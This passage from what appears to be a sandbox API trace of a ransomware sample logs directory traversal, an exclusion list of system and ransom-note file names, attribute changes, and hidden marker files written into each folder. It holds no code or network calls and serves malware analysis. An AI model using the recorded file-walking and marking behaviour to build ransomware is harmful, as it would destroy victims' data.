(lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0062.074] lstrcpyW (in: lpString1=0x130ebe6, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0062.074] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0062.075] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221e0 [0062.075] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116930 [0062.075] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221e8 | out: ListHead=0xf68b0, ListEntry=0x1221e8) returned 0x122068 [0062.075] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf2306679, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf2306679, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0062.075] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.075] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.075] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0062.075] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0062.075] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0062.075] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0062.075] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0062.075] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0062.075] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0062.075] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0062.075] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0062.075] lstrcpyW (in: lpString1=0x130ebe6, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0062.075] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0062.075] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0062.075] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x116860 [0062.075] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x1221e8 [0062.076] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf2306679, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf2306679, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0062.076] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.076] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.076] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0062.076] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0062.076] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0062.076] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0062.076] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0062.076] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0062.076] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0062.076] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0062.076] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0062.076] lstrcpyW (in: lpString1=0x130ebe6, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0062.076] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0062.076] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0062.076] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x115dd0 [0062.076] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x1222e8 [0062.076] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2306679, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf2306679, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0062.076] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.076] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.076] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0062.076] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0062.076] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0062.076] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0062.076] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0062.076] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0062.077] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0062.077] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0062.077] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0062.077] lstrcpyW (in: lpString1=0x130ebe6, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0062.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0062.077] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x11e368 [0062.077] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122248 [0062.077] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2306679, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf2306679, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0062.077] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0062.077] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.077] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.077] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.077] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.078] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.078] CloseHandle (hObject=0x298) returned 1 [0062.078] CloseHandle (hObject=0x27c) returned 1 [0062.078] GetCurrentThreadId () returned 0xd98 [0062.078] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0062.078] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp" [0062.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e368 | out: hHeap=0xe0000) returned 1 [0062.078] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0062.078] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp" [0062.078] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp\\" [0062.078] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0062.078] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.080] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.083] FlushFileBuffers (hFile=0x27c) returned 1 [0062.083] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.084] CloseHandle (hObject=0x27c) returned 1 [0062.084] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp") returned 91 [0062.084] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.084] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2306679, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee522593, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0062.084] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.084] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.084] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.084] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.085] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2306679, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee522593, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.085] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.085] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.085] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.085] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.085] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.085] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee522593, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee522593, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee548a17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.085] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.085] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.085] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee522593, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee522593, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee548a17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.085] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0062.085] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.085] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.086] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.086] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.086] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.086] CloseHandle (hObject=0x298) returned 1 [0062.086] CloseHandle (hObject=0x27c) returned 1 [0062.086] GetCurrentThreadId () returned 0xd98 [0062.086] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0062.086] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory" [0062.087] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115dd0 | out: hHeap=0xe0000) returned 1 [0062.087] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0062.087] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory" [0062.087] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory\\" [0062.087] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0062.087] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.088] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.090] FlushFileBuffers (hFile=0x27c) returned 1 [0062.091] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.091] CloseHandle (hObject=0x27c) returned 1 [0062.092] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory") returned 98 [0062.092] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.092] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf2306679, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee548a17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0062.092] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.092] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.092] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.092] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.092] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf2306679, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee548a17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.092] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.092] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.092] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.092] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.092] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.092] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee548a17, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee548a17, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee548a17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.092] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.092] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.092] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee548a17, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee548a17, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee548a17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.092] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0062.093] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.093] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.093] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.093] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.093] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.094] CloseHandle (hObject=0x298) returned 1 [0062.094] CloseHandle (hObject=0x27c) returned 1 [0062.094] GetCurrentThreadId () returned 0xd98 [0062.094] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0062.094] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies" [0062.094] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116860 | out: hHeap=0xe0000) returned 1 [0062.094] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0062.094] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies" [0062.094] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies\\") 